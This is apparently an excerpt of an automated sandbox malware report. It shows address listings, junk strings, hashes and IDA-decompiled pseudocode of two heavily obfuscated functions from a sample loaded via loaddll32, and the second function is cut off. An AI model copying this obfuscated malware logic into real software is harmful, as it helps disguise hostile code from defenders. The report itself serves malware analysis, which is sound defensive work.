0x02b35af7
0x02b35b02
0x02b35b12
0x02b35b19
0x02b35b24
0x02b35b2f
0x02b35b37
0x02b35b42
0x02b35b4d
0x02b35b58
0x02b35b60
0x02b35b6b
0x02b35b76
0x02b35b81
0x02b35b89
0x02b35b94
0x02b35b9f
0x02b35baa
0x02b35bb5
0x02b35bc0
0x02b35bcb
0x02b35bd6
0x02b35be1
0x02b35bec
0x02b35bf4
0x02b35bfc
0x02b35c04
0x02b35c09
0x02b35c11
0x02b35c1c
0x02b35c27
0x02b35c32
0x02b35c3d
0x02b35c4a
0x02b35c52
0x02b35c5a
0x02b35c65
0x02b35c6d
0x02b35c75
0x02b35c7d
0x02b35c85
0x02b35c8d
0x02b35c98
0x02b35ca3
0x02b35cab
0x02b35cb6
0x02b35cbe
0x02b35cc6
0x02b35cce
0x02b35cd6
0x02b35cde
0x02b35ced
0x02b35cee
0x02b35cf2
0x02b35cfa
0x02b35d02
0x02b35d0a
0x02b35d12
0x02b35d1a
0x02b35d22
0x02b35d2a
0x02b35d37
0x02b35d3b
0x02b35d40
0x02b35d45
0x02b35d4d
0x02b35d55
0x02b35d5a
0x02b35d5e
0x02b35d63
0x02b35d6b
0x02b35d73
0x02b35d78
0x02b35d85
0x02b35d89
0x02b35d91
0x02b35d99
0x02b35d9e
0x02b35da3
0x02b35da8
0x02b35db0
0x02b35db8
0x02b35dc2
0x02b35dc6
0x02b35dcb
0x02b35dd3
0x02b35dde
0x02b35de6
0x02b35df1
0x02b35dfc
0x02b35e07
0x02b35e12
0x02b35e1a
0x02b35e28
0x02b35e2c
0x02b35e34
0x02b35e3c
0x02b35e44
0x02b35e51
0x02b35e55
0x02b35e5d
0x02b35e65
0x02b35e70
0x02b35e7b
0x02b35e86
0x02b35e93
0x02b35e9e
0x02b35ea6
0x02b35eb1
0x02b35ebc
0x02b35ec4
0x02b35ecf
0x02b35ed7
0x02b35edc
0x02b35ee4
0x02b35eec
0x02b35ef4
0x02b35eff
0x02b35f09
0x02b35f0c
0x02b35f13
0x02b35f1e
0x02b35f2b
0x02b35f2f
0x02b35f37
0x02b35f3b
0x02b35f43
0x02b35f56
0x02b35f66
0x02b35f67
0x02b35f70
0x02b35f7b
0x02b35f86
0x02b35f8e
0x02b35f99
0x02b35fa4
0x02b35fac
0x02b35fb4
0x02b35fbc
0x02b35fc0
0x02b35fc8
0x02b35fde
0x02b35fe5
0x02b35ff0
0x02b35ffb
0x02b36006
0x02b36011
0x02b3601c
0x02b36027
0x02b36032
0x02b3603d
0x02b36045
0x02b36050
0x02b36063
0x02b36064
0x02b3606b
0x02b36076
0x02b36081
0x02b3608c
0x02b36097
0x02b360a4
0x02b360a8
0x02b360b0
0x02b360b5
0x02b360bd
0x02b360d0
0x02b360d7
0x02b360e2
0x02b360ed
0x02b36102
0x02b3610b
0x02b36116
0x02b3611b
0x02b36126
0x02b36131
0x02b3613c
0x02b36147
0x02b36152
0x02b36165
0x02b36168
0x02b36173
0x02b3617e
0x02b36185
0x02b36190
0x02b3619b
0x02b361a6
0x02b361b1
0x02b361bc
0x02b361cf
0x02b361d6
0x02b361e1
0x02b361ec
0x02b36202
0x02b36209
0x02b36214
0x02b3621f
0x02b3622a
0x02b3623a
0x02b3623d
0x02b36244
0x02b3624f
0x02b3625a
0x02b36270
0x02b36277
0x02b36282
0x02b3628e
0x02b36293
0x02b36299
0x02b3629e
0x02b362a3
0x02b362ab
0x02b362be
0x02b362bf
0x02b362cf
0x02b362d4
0x02b362db
0x02b362e6
0x02b362f1
0x02b362fc
0x02b36307
0x02b36312
0x02b36312
0x02b36317
0x02b3631c
0x02b3631c
0x02b3631c
0x02b3631c
0x02b36322
0x00000000
0x00000000
0x02b36578
0x02b3657e
0x02b366b2
0x02b366b7
0x00000000
0x02b36584
0x02b36584
0x02b3658a
0x02b3665a
0x02b3665b
0x02b36663
0x02b36668
0x02b3666f
0x02b36672
0x02b36674
0x02b3667d
0x02b36682
0x02b36685
0x00000000
0x02b36590
0x02b36590
0x02b36596
0x02b36637
0x00000000
0x02b3659c
0x02b3659c
0x02b365a2
0x02b365a8
0x02b365b1
0x02b365b5
0x02b365fb
0x02b36600
0x02b3660b
0x02b36616
0x02b3662d
0x02b3656e
0x02b3656e
0x02b366bc
0x02b366bc
0x02b366c3
0x02b366cb
0x02b366cb
0x00000000
0x02b365a2
0x02b36596
0x02b3658a
0x02b36700
0x02b3670a
0x02b3670a
0x02b36328
0x02b3648f
0x02b36498
0x02b3649f
0x02b364ad
0x02b364bc
0x02b364c3
0x02b364ca
0x02b3651c
0x02b36524
0x02b36541
0x02b36546
0x02b36564
0x02b36569
0x00000000
0x02b3632e
0x02b36330
0x02b36469
0x02b36470
0x02b3647c
0x02b3647e
0x02b36482
0x02b36487
0x00000000
0x02b36336
0x02b36338
0x02b366f7
0x02b3633e
0x02b36340
0x02b363fd
0x02b3640e
0x02b36411
0x02b36416
0x02b36418
0x00000000
0x02b36346
0x02b3634c
0x02b363c5
0x02b363cc
0x00000000
0x02b3634e
0x02b36350
0x00000000
0x02b36356
0x02b36388
0x02b3638f
0x02b363a0
0x02b363a3
0x02b363a3
0x00000000
0x02b363a3
0x02b36350
0x02b3634c
0x02b36340
0x02b36338
0x02b36330
0x00000000
0x02b366d0
0x02b366d0
0x02b366d0
0x00000000
0x02b366dc
0x02b36317

Strings

(INK, xrefs: 02B35DE6
5 , xrefs: 02B35D12
Jm, xrefs: 02B35EFF
{4, xrefs: 02B35CFA
W, xrefs: 02B35BC0
tJP, xrefs: 02B35E3C
P_W, xrefs: 02B35D6B
2G, xrefs: 02B35905
NI5, xrefs: 02B35FC8
W"j, xrefs: 02B36006
`, xrefs: 02B3621F

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: (INK$2G$5 $Jm$NI5$P_W$W"j$`$tJP${4$W
API String ID: 0-4122124823
Opcode ID: 53fe4eb8ac97a56d255efa0c6896bff858b104615d44fdcf266595fef31d67ce
Instruction ID: 0317cecb07e8b74a6de117123059af7161e031baaea5d306d1dae385faee8d39
Opcode Fuzzy Hash: 53fe4eb8ac97a56d255efa0c6896bff858b104615d44fdcf266595fef31d67ce
Instruction Fuzzy Hash: FB72ED715093809FD779CF65C98AB8BBBE2BBC4304F108A1DE2D986260D7B18559DF42

Uniqueness

Uniqueness Score: -1.00%

Function 02B3D14C, Relevance: 14.1, Strings: 11, Instructions: 385
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E02B3D14C() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t429;
				intOrPtr _t432;
				intOrPtr _t436;
				signed int _t440;
				void* _t441;
				void* _t459;
				signed int _t468;
				intOrPtr _t469;
				intOrPtr* _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t476;
				signed int* _t477;
				void* _t480;

				_t477 =  &_v1756;
				_v1600 = 0x9247ff;
				_t441 = 0xcb67425;
				_v1600 = _v1600 + 0x9ce;
				_v1600 = _v1600 ^ 0x009251e4;
				_v1720 = 0x31cc78;
				_v1720 = _v1720 ^ 0xe44f8b4e;
				_v1720 = _v1720 | 0xfbe7febf;
				_v1720 = _v1720 ^ 0xfff0ff80;
				_v1612 = 0x6730db;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0xcc36c002;
				_v1668 = 0x7fe6a4;
				_v1668 = _v1668 + 0xffff1494;
				_v1668 = _v1668 ^ 0x091c946b;
				_v1668 = _v1668 ^ 0x09626f51;
				_v1756 = 0x73e886;
				_v1756 = _v1756 | 0xafbdbbdf;
				_v1756 = _v1756 + 0xfe30;
				_v1756 = _v1756 ^ 0xb000fa0f;
				_v1604 = 0x468da6;
				_v1604 = _v1604 + 0xffffc3ca;
				_v1604 = _v1604 ^ 0x00465160;
				_v1592 = 0xd4519;
				_v1592 = _v1592 + 0x934d;
				_v1592 = _v1592 ^ 0x0004ddfc;
				_v1640 = 0x8a1a75;
				_v1640 = _v1640 + 0x87da;
				_v1640 = _v1640 + 0xaa53;
				_v1640 = _v1640 ^ 0x008e8924;
				_v1648 = 0xe80c10;
				_v1648 = _v1648 ^ 0x90af551f;
				_v1648 = _v1648 + 0x6d6d;
				_v1648 = _v1648 ^ 0x90403b69;
				_v1712 = 0x809df1;
				_v1712 = _v1712 << 2;
				_v1712 = _v1712 << 7;
				_v1576 = _v1576 & 0x00000000;
				_v1712 = _v1712 * 0x69;
				_v1712 = _v1712 ^ 0x81832f4f;
				_v1656 = 0xe952a2;
				_v1656 = _v1656 | 0x54fcc54b;
				_v1656 = _v1656 + 0xffff1739;
				_v1656 = _v1656 ^ 0x54fad21b;
				_v1700 = 0xbcdb1b;
				_v1700 = _v1700 + 0xdccd;
				_v1700 = _v1700 + 0xffffcf6f;
				_v1700 = _v1700 ^ 0x00b72c28;
				_v1628 = 0x5c7dad;
				_v1628 = _v1628 >> 5;
				_v1628 = _v1628 + 0x3d87;
				_v1628 = _v1628 ^ 0x000cf9b2;
				_v1660 = 0x2281c9;
				_v1660 = _v1660 * 0x49;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x004fb411;
				_v1568 = 0xcd133d;
				_v1568 = _v1568 * 0x4e;
				_v1568 = _v1568 ^ 0x3e7dd872;
				_v1672 = 0x86c6ca;
				_v1672 = _v1672 * 0x5f;
				_v1672 = _v1672 + 0xffff3952;
				_v1672 = _v1672 ^ 0x3200c70e;
				_v1588 = 0x24e2cc;
				_v1588 = _v1588 | 0xcf150453;
				_v1588 = _v1588 ^ 0xcf3ce5d0;
				_v1572 = 0x6249a8;
				_v1572 = _v1572 << 6;
				_v1572 = _v1572 ^ 0x189f8b0c;
				_v1596 = 0x119a44;
				_v1596 = _v1596 >> 8;
				_v1596 = _v1596 ^ 0x000b5fad;
				_v1680 = 0xd16cc2;
				_v1680 = _v1680 ^ 0x4916a611;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 ^ 0x00055714;
				_v1728 = 0x441d3d;
				_t471 = 0x35;
				_v1728 = _v1728 * 3;
				_v1728 = _v1728 << 3;
				_v1728 = _v1728 | 0x559f2c94;
				_v1728 = _v1728 ^ 0x57fdad3a;
				_v1564 = 0xb1e813;
				_v1564 = _v1564 >> 0xc;
				_v1564 = _v1564 ^ 0x0004104c;
				_v1736 = 0x70197f;
				_v1736 = _v1736 >> 0x10;
				_v1736 = _v1736 + 0xe51d;
				_v1736 = _v1736 * 0x61;
				_v1736 = _v1736 ^ 0x00557f63;
				_v1744 = 0x5ff0e3;
				_v1744 = _v1744 + 0xffff2d97;
				_v1744 = _v1744 + 0xffff9c65;
				_v1744 = _v1744 ^ 0xd07f01de;
				_v1744 = _v1744 ^ 0xd026cc62;
				_v1608 = 0x914f5e;
				_v1608 = _v1608 << 0xf;
				_v1608 = _v1608 ^ 0xa7adba7a;
				_v1664 = 0xe3376f;
				_v1664 = _v1664 >> 8;
				_v1664 = _v1664 << 4;
				_v1664 = _v1664 ^ 0x000bcae6;
				_v1616 = 0x54b2fb;
				_v1616 = _v1616 + 0xce1d;
				_v1616 = _v1616 ^ 0x005b3b7b;
				_v1644 = 0xe2ce3f;
				_v1644 = _v1644 + 0x16f2;
				_v1644 = _v1644 >> 0xd;
				_v1644 = _v1644 ^ 0x000e1e70;
				_v1752 = 0x7f4aca;
				_v1752 = _v1752 ^ 0x883f1d9d;
				_v1752 = _v1752 + 0x59a5;
				_v1752 = _v1752 | 0x80ddc91b;
				_v1752 = _v1752 ^ 0x88d3833c;
				_v1636 = 0xc2c2cf;
				_v1636 = _v1636 / _t471;
				_v1636 = _v1636 + 0xffff5d17;
				_v1636 = _v1636 ^ 0x0005a2c5;
				_v1676 = 0x4604e2;
				_v1676 = _v1676 * 0x76;
				_v1676 = _v1676 + 0xdac5;
				_v1676 = _v1676 ^ 0x2048b942;
				_v1652 = 0x890d36;
				_v1652 = _v1652 >> 3;
				_v1652 = _v1652 | 0xfe9d52c1;
				_v1652 = _v1652 ^ 0xfe9ab4fb;
				_v1684 = 0xd96cde;
				_v1684 = _v1684 * 0x47;
				_v1684 = _v1684 + 0xffff480a;
				_v1684 = _v1684 ^ 0x3c48c040;
				_v1624 = 0xc48732;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x01665cbd;
				_v1624 = _v1624 ^ 0x016df620;
				_v1692 = 0x58f5b8;
				_v1692 = _v1692 << 4;
				_v1692 = _v1692 ^ 0x299232ca;
				_v1692 = _v1692 ^ 0x2c1b7361;
				_v1732 = 0x9987b4;
				_v1732 = _v1732 << 4;
				_v1732 = _v1732 ^ 0x14505727;
				_v1732 = _v1732 | 0xbadb6758;
				_v1732 = _v1732 ^ 0xbfd57076;
				_v1708 = 0x151e5;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 >> 0xe;
				_v1708 = _v1708 + 0xffff12c7;
				_v1708 = _v1708 ^ 0xffff0a0d;
				_v1580 = 0x15a9fb;
				_v1580 = _v1580 >> 6;
				_v1580 = _v1580 ^ 0x0004a695;
				_v1688 = 0x871746;
				_t472 = 0x34;
				_v1688 = _v1688 / _t472;
				_v1688 = _v1688 + 0xffff07ae;
				_v1688 = _v1688 ^ 0x00087c5e;
				_v1740 = 0xe3d16b;
				_v1740 = _v1740 << 7;
				_v1740 = _v1740 | 0x6cb9ee1d;
				_v1740 = _v1740 ^ 0x38143ac0;
				_v1740 = _v1740 ^ 0x45e6e926;
				_v1724 = 0xe03c47;
				_v1724 = _v1724 + 0x7497;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 + 0xffff69be;
				_v1724 = _v1724 ^ 0x2c306d9d;
				_v1748 = 0xe2efab;
				_v1748 = _v1748 | 0x110de103;
				_v1748 = _v1748 + 0x3577;
				_t473 = 0x2b;
				_t440 = _v1576;
				_v1748 = _v1748 / _t473;
				_v1748 = _v1748 ^ 0x006272f3;
				_v1716 = 0x295420;
				_v1716 = _v1716 ^ 0xaa3d2c48;
				_v1716 = _v1716 + 0xffff3248;
				_v1716 = _v1716 ^ 0xb95b2034;
				_v1716 = _v1716 ^ 0x134f16e6;
				_v1620 = 0x315b6e;
				_v1620 = _v1620 ^ 0xed866512;
				_v1620 = _v1620 ^ 0xedb02c8f;
				_v1696 = 0xb25998;
				_t476 = _v1576;
				_t468 = _v1576;
				_v1696 = _v1696 * 0xf;
				_v1696 = _v1696 << 9;
				_v1696 = _v1696 ^ 0xe675be87;
				_v1632 = 0x9ab851;
				_v1632 = _v1632 ^ 0x37be7fac;
				_v1632 = _v1632 + 0xffff726f;
				_v1632 = _v1632 ^ 0x372cadd5;
				_v1704 = 0xe98d3;
				_v1704 = _v1704 | 0xb808fc66;
				_v1704 = _v1704 ^ 0xb98541de;
				_v1704 = _v1704 | 0x92c26071;
				_v1704 = _v1704 ^ 0x93ce4092;
				_v1584 = 0x695255;
				_v1584 = _v1584 | 0x2c3ea780;
				_v1584 = _v1584 ^ 0x2c75cea7;
				while(1) {
					L1:
					while(1) {
						_t459 = 0x5c;
						do {
							while(1) {
								L3:
								_t480 = _t441 - 0xc1f8872;
								if(_t480 > 0) {
									break;
								}
								if(_t480 == 0) {
									E02B33046(_v1696, _v1632, _v1704, _t440, _v1584);
								} else {
									if(_t441 == 0x1770085) {
										_t476 = E02B47C4E(_t440, _t459, _t441, _v1644, _v1752, _v1668, _v1636, _v1676, _v1756, _v1652, _t468, _v1684, _v1604, _v1624, _t441, _v1692, _t441, _v1732, _t441, _t468, _v1708,  &_v1560, _v1580, _v1612);
										_t477 =  &(_t477[0x16]);
										__eflags = _t476;
										if(_t476 == 0) {
											goto L10;
										} else {
											_t441 = 0x650cb13;
											_v1576 = 1;
											while(1) {
												_t459 = 0x5c;
												goto L3;
											}
										}
									} else {
										if(_t441 == 0x30ba806) {
											_t469 =  *0x2b56214; // 0x0
											_t470 = _t469 + 0x23c;
											while(1) {
												__eflags =  *_t470 - _t459;
												if( *_t470 == _t459) {
													break;
												}
												_t470 = _t470 + 2;
												__eflags = _t470;
											}
											_t468 = _t470 + 2;
											_t441 = 0xd1695f5;
											continue;
										} else {
											if(_t441 == 0x650cb13) {
												E02B4B257(_t440, _v1688, _v1740, _t476);
												_t441 = 0x8b9ab05;
												while(1) {
													_t459 = 0x5c;
													goto L3;
												}
											} else {
												if(_t441 != 0x8b9ab05) {
													goto L25;
												} else {
													_t352 =  &_v1748; // 0x45e6e926
													E02B33046(_v1724,  *_t352, _v1716, _t476, _v1620);
													_t477 =  &(_t477[3]);
													L10:
													_t441 = 0xc1f8872;
													while(1) {
														_t459 = 0x5c;
														goto L3;
													}
												}
											}
										}
									}
								}
								L28:
								return _v1576;
							}
							__eflags = _t441 - 0xcb67425;
							if(_t441 == 0xcb67425) {
								E02B31A34(_v1592,  &_v520, _t441, _t441, _v1640, _v1648, _v1712, _t441, _v1600, _v1656);
								_t477 =  &(_t477[8]);
								_t441 = 0xd521465;
								_t459 = 0x5c;
								goto L25;
							} else {
								__eflags = _t441 - 0xd1695f5;
								if(_t441 == 0xd1695f5) {
									_t440 = E02B4E8B6(_t441, _v1608, _v1664, _t441, _v1720, _v1616);
									_t477 =  &(_t477[4]);
									__eflags = _t440;
									if(_t440 != 0) {
										_t441 = 0x1770085;
										_t459 = 0x5c;
										goto L3;
									}
								} else {
									__eflags = _t441 - 0xd521465;
									if(__eflags != 0) {
										goto L25;
									} else {
										_push(_v1568);
										_push(_v1660);
										_push(_v1628);
										_t429 = E02B4E1F8(0x2b31030, _v1700, __eflags);
										E02B37078( &_v1040, __eflags);
										_t432 =  *0x2b56214; // 0x0
										_t436 =  *0x2b56214; // 0x0
										E02B3F96F(_v1672, __eflags, _t436 + 0x34, _t429,  &_v1040, _v1588,  &_v1560, _t432 + 0x23c, _v1572, _v1596, _v1680,  &_v520);
										E02B4FECB(_t429, _v1728, _v1564, _v1736, _v1744);
										_t477 =  &(_t477[0x10]);
										_t441 = 0x30ba806;
										goto L1;
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t441 - 0x3fe9fd3;
						} while (_t441 != 0x3fe9fd3);
						goto L28;
					}
				}
			}

0x02b3d14c
0x02b3d156
0x02b3d161
0x02b3d166
0x02b3d171
0x02b3d17c
0x02b3d184
0x02b3d18c
0x02b3d194
0x02b3d19c
0x02b3d1a7
0x02b3d1af
0x02b3d1ba
0x02b3d1c2
0x02b3d1ca
0x02b3d1d2
0x02b3d1da
0x02b3d1e2
0x02b3d1ea
0x02b3d1f2
0x02b3d1fa
0x02b3d205
0x02b3d210
0x02b3d21b
0x02b3d226
0x02b3d231
0x02b3d23c
0x02b3d247
0x02b3d252
0x02b3d25d
0x02b3d268
0x02b3d270
0x02b3d278
0x02b3d280
0x02b3d288
0x02b3d290
0x02b3d295
0x02b3d29f
0x02b3d2a7
0x02b3d2ab
0x02b3d2b3
0x02b3d2bb
0x02b3d2c3
0x02b3d2cb
0x02b3d2d3
0x02b3d2db
0x02b3d2e3
0x02b3d2eb
0x02b3d2f3
0x02b3d2fe
0x02b3d306
0x02b3d311
0x02b3d31c
0x02b3d329
0x02b3d32d
0x02b3d332
0x02b3d33a
0x02b3d34d
0x02b3d354
0x02b3d35f
0x02b3d36c
0x02b3d370
0x02b3d378
0x02b3d380
0x02b3d38b
0x02b3d396
0x02b3d3a1
0x02b3d3ac
0x02b3d3b4
0x02b3d3bf
0x02b3d3ca
0x02b3d3d2
0x02b3d3dd
0x02b3d3e5
0x02b3d3ed
0x02b3d3f4
0x02b3d3fc
0x02b3d40b
0x02b3d40c
0x02b3d410
0x02b3d415
0x02b3d41d
0x02b3d425
0x02b3d430
0x02b3d438
0x02b3d443
0x02b3d44b
0x02b3d450
0x02b3d45d
0x02b3d461
0x02b3d469
0x02b3d471
0x02b3d479
0x02b3d481
0x02b3d489
0x02b3d491
0x02b3d49c
0x02b3d4a4
0x02b3d4af
0x02b3d4b7
0x02b3d4bc
0x02b3d4c1
0x02b3d4c9
0x02b3d4d4
0x02b3d4df
0x02b3d4ea
0x02b3d4f5
0x02b3d500
0x02b3d508
0x02b3d513
0x02b3d51b
0x02b3d523
0x02b3d52b
0x02b3d533
0x02b3d53b
0x02b3d54f
0x02b3d556
0x02b3d561
0x02b3d56c
0x02b3d579
0x02b3d57d
0x02b3d585
0x02b3d58d
0x02b3d595
0x02b3d59a
0x02b3d5a2
0x02b3d5aa
0x02b3d5b7
0x02b3d5bb
0x02b3d5c3
0x02b3d5cb
0x02b3d5d6
0x02b3d5de
0x02b3d5e9
0x02b3d5f4
0x02b3d5fc
0x02b3d601
0x02b3d609
0x02b3d611
0x02b3d619
0x02b3d61e
0x02b3d626
0x02b3d62e
0x02b3d636
0x02b3d63e
0x02b3d643
0x02b3d648
0x02b3d650
0x02b3d65a
0x02b3d665
0x02b3d66d
0x02b3d678
0x02b3d686
0x02b3d68b
0x02b3d691
0x02b3d699
0x02b3d6a1
0x02b3d6a9
0x02b3d6ae
0x02b3d6b6
0x02b3d6be
0x02b3d6c6
0x02b3d6ce
0x02b3d6d6
0x02b3d6db
0x02b3d6e3
0x02b3d6eb
0x02b3d6f3
0x02b3d6fb
0x02b3d707
0x02b3d70a
0x02b3d711
0x02b3d715
0x02b3d71d
0x02b3d725
0x02b3d72d
0x02b3d735
0x02b3d73d
0x02b3d745
0x02b3d750
0x02b3d75b
0x02b3d766
0x02b3d773
0x02b3d77a
0x02b3d781
0x02b3d785
0x02b3d78a
0x02b3d792
0x02b3d79d
0x02b3d7a8
0x02b3d7b3
0x02b3d7be
0x02b3d7c6
0x02b3d7ce
0x02b3d7d6
0x02b3d7de
0x02b3d7e6
0x02b3d7f1
0x02b3d7fc
0x02b3d807
0x02b3d807
0x02b3d80c
0x02b3d80e
0x02b3d80f
0x02b3d80f
0x02b3d80f
0x02b3d80f
0x02b3d811
0x00000000
0x00000000
0x02b3d817
0x02b3da90
0x02b3d81d
0x02b3d823
0x02b3d90c
0x02b3d90e
0x02b3d911
0x02b3d913
0x00000000
0x02b3d919
0x02b3d919
0x02b3d91e
0x02b3d80c
0x02b3d80e
0x00000000
0x02b3d80e
0x02b3d80c
0x02b3d825
0x02b3d82b
0x02b3d87a
0x02b3d880
0x02b3d88b
0x02b3d88b
0x02b3d88e
0x00000000
0x00000000
0x02b3d888
0x02b3d888
0x02b3d888
0x02b3d890
0x02b3d893
0x00000000
0x02b3d82d
0x02b3d833
0x02b3d86c
0x02b3d873
0x02b3d80c
0x02b3d80e
0x00000000
0x02b3d80e
0x02b3d835
0x02b3d83b
0x00000000
0x02b3d841
0x02b3d84d
0x02b3d855
0x02b3d85a
0x02b3d85d
0x02b3d85d
0x02b3d80c
0x02b3d80e
0x00000000
0x02b3d80e
0x02b3d80c
0x02b3d83b
0x02b3d833
0x02b3d82b
0x02b3d823
0x02b3da98
0x02b3daa9
0x02b3daa9
0x02b3d92e
0x02b3d934
0x02b3da5b
0x02b3da60
0x02b3da63
0x02b3da6a
0x00000000
0x02b3d93a
0x02b3d93a
0x02b3d940
0x02b3da1a
0x02b3da1c
0x02b3da1f
0x02b3da21
0x02b3da23
0x02b3d80e
0x00000000
0x02b3d80e
0x02b3d946
0x02b3d946
0x02b3d94c
0x00000000
0x02b3d952
0x02b3d952
0x02b3d95e
0x02b3d962
0x02b3d96d
0x02b3d97b
0x02b3d99f
0x02b3d9c8
0x02b3d9d2
0x02b3d9ec
0x02b3d9f1
0x02b3d9f4
0x00000000
0x02b3d9f4
0x02b3d94c
0x02b3d940
0x00000000
0x02b3da6b
0x02b3da6b
0x02b3da6b
0x00000000
0x02b3da77
0x02b3d80c

Strings

T), xrefs: 02B3D71D
mm, xrefs: 02B3D278
&E, xrefs: 02B3D84D
Qob, xrefs: 02B3D1D2
G<, xrefs: 02B3D6C6
URi, xrefs: 02B3D7E6
`QF, xrefs: 02B3D210
o7, xrefs: 02B3D4AF
n[1, xrefs: 02B3D745
w5, xrefs: 02B3D6FB
{;[, xrefs: 02B3D4DF

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: T)$&E$G<$Qob$URi$`QF$mm$n[1$o7$w5${;[
API String ID: 0-1763375246
Opcode ID: 6673c44fadcf27d44766cea53a242cb41d4aacb61056879e3aaba3d10b1dc05a
Instruction ID: e254fcd5cda8fae7ca125a42cf61faacbc2fe58cc733cfdaacf9ee27cb0903e9
Opcode Fuzzy Hash: 6673c44fadcf27d44766cea53a242cb41d4aacb61056879e3aaba3d10b1dc05a
Instruction Fuzzy Hash: 0E2213714093819FD3B9CF61C94AA9BBBE1FBC5748F10890CE2DA96260D7B18549CF53

Uniqueness

Uniqueness Score: -1.00%

Function 02B45779, Relevance: 12.9, Strings: 10, Instructions: 430
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E02B45779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v88;
				char _v92;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				unsigned int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				void* _t410;
				void* _t455;
				void* _t464;
				intOrPtr _t469;
				void* _t475;
				intOrPtr* _t477;
				void* _t479;
				signed int _t492;
				signed char* _t519;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed char* _t532;
				intOrPtr _t533;
				intOrPtr _t534;
				void* _t535;
				signed char* _t536;
				intOrPtr* _t537;
				signed int* _t539;
				signed int* _t541;
				void* _t543;

				_t477 = _a12;
				_push(_t477);
				_push(_a8);
				_t533 = __edx;
				_t537 = __ecx;
				_push(_a4);
				_v104 = __edx;
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t410);
				_v48 = 0xc2c967;
				_v108 = _v108 & 0x00000000;
				asm("stosd");
				_t539 =  &(( &_v288)[5]);
				_t479 = 0x2d8a01e;
				asm("stosd");
				asm("stosd");
				_v268 = 0x13192e;
				_v268 = _v268 >> 0xe;
				_t522 = 0x7a;
				_v268 = _v268 / _t522;
				_v268 = _v268 ^ 0xa67107cf;
				_v268 = _v268 ^ 0xa67107cf;
				_v180 = 0x822106;
				_v180 = _v180 ^ 0x7b43f696;
				_v180 = _v180 ^ 0xd3ff461a;
				_v180 = _v180 ^ 0xa83e91ca;
				_v260 = 0xfc96b3;
				_v260 = _v260 ^ 0x88d779ee;
				_v260 = _v260 | 0x0ca97313;
				_v260 = _v260 ^ 0xca187f30;
				_v260 = _v260 ^ 0x46b3802f;
				_v288 = 0x4333cc;
				_v288 = _v288 << 0xf;
				_t523 = 0x34;
				_v288 = _v288 / _t523;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x005b8977;
				_v136 = 0xc5dc93;
				_v136 = _v136 * 0xc;
				_v136 = _v136 ^ 0x0945f62e;
				_v128 = 0x6b700a;
				_t57 =  &_v128; // 0x6b700a
				_v128 =  *_t57 * 0x15;
				_v128 = _v128 ^ 0x08d49145;
				_v232 = 0xf79846;
				_v232 = _v232 ^ 0xca57ef9e;
				_v232 = _v232 ^ 0x925d174a;
